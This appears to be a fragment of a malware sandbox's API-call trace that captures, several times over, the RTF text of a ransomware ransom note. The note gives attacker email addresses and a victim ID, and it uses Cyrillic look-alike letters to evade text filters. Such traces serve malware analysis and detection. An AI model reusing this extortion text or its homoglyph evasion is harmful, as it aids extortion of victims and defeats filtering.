th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 